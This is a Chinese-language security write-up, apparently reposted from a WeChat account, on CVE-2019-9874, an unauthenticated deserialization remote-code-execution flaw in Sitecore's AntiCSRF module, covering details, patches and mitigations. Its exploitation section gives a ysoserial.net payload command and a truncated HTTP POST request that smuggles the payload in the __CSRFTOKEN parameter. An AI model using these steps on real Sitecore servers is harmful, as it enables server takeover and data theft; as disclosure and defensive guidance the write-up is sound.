概述
Sitecore 的CSRF 模块中的两个严重漏洞再次成为活跃威胁,最近CISA将其加入已知被利用漏洞清单 (Known Exploited Vulnerabilities Catalog)。
CVE-2019-9874 是一个影响 Sitecore CMS 和 Experience Platform (XP) 的漏洞,发布日期为 2019 年 5 月 31 日。该漏洞存在于 Sitecore.Security.AntiCSRF 模块中,因 .NET 对象反序列化处理不当而导致远程代码执行 (RCE)。
其 CVSS v3 分数为 9.8(危急),表明这是一个极为严重的安全问题,与 CVE-2019-9875 的主要区别在于此漏洞无需认证即可利用。
漏洞详情
•影响版本:Sitecore Experience Platform (XP) 9.1 及更早版本。•漏洞类型:反序列化漏洞 (Deserialization Vulnerability)。•CVE ID:CVE-2019-9874。•攻击向量:网络 (Network)。•攻击复杂度:低 (Low)。•权限要求:无需认证 (None)。•影响:允许未经认证的攻击者在目标系统上执行任意代码。
该漏洞源于 Sitecore.Security.AntiCSRF 模块未对通过 HTTP POST 参数 __CSRFTOKEN 传递的序列化数据进行充分验证或过滤。攻击者可构造恶意的 .NET 对象并嵌入其中,服务器反序列化时会触发代码执行。由于无需认证,攻击门槛极低。
利用条件
1.目标系统运行受影响的 Sitecore XP 版本。2.攻击者能够通过 HTTP POST 请求将恶意数据发送到服务器。3.无需用户凭据或会话认证。
利用步骤
1.构造恶意数据:•使用工具(如 ysoserial.net)生成恶意的 .NET 序列化对象。
ysoserial.exe -g TypeConfuseDelegate-f ObjectStateFormatter-o base64 -c'calc.exe'
2.发送请求:•将序列化数据嵌入 __CSRFTOKEN 参数。•通过 HTTP POST 发送到 Sitecore 实例的受影响端点。
POST /sitecore/shell/Applications/Security/CreateNewUser/CreateNewUser.aspx HTTP/1.1Host: victimhostCookie: __CSRFCOOKIE=test;Content-Type: application/x-www-form-urlencodedContent-Length:3156__CSRFTOKEN=/wEysRIAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj00[…]
3.触发执行:•服务器处理请求时,反序列化 __CSRFTOKEN 参数,执行嵌入的恶意代码。
潜在影响
•代码执行:攻击者可在服务器上运行任意命令,如部署后门、窃取数据或破坏系统。•系统完全控制:无需认证即可接管服务器。•数据泄露:访问 Sitecore 数据库中的敏感信息,如用户数据或业务记录。
修复措施
•升级版本:Sitecore 官方已发布补丁,建议升级至 9.1 Update-1 或更高版本。•临时缓解:•限制对 /sitecore/shell 路径的外部访问,使用防火墙仅允许可信 IP。•监控异常 POST 请求,特别是 __CSRFTOKEN 参数。•若无法立即升级,考虑禁用受影响模块(需评估业务影响)。
注意事项
•该漏洞无需认证,较 CVE-2019-9875(需认证)更危险,攻击面更广。•被列入 CISA 已知被利用漏洞清单 (Known Exploited Vulnerabilities Catalog),表明已在野外被利用。•参考 Sitecore 官方知识库: https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB0334035
分析局限性
•具体利用细节因目标配置而异,需结合实际环境测试。•完整的公开 PoC,但其高危性和无需认证特性使其易被攻击者利用。
仅限交流学习使用,如您在使用本工具或代码的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。“如侵权请私聊公众号删文”。
原文始发于微信公众号(柠檬赏金猎人):Sitecore几年前的洞CVE-2019-9874:反序列化实现的未经认证的 RCE(CVSS 9.8)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论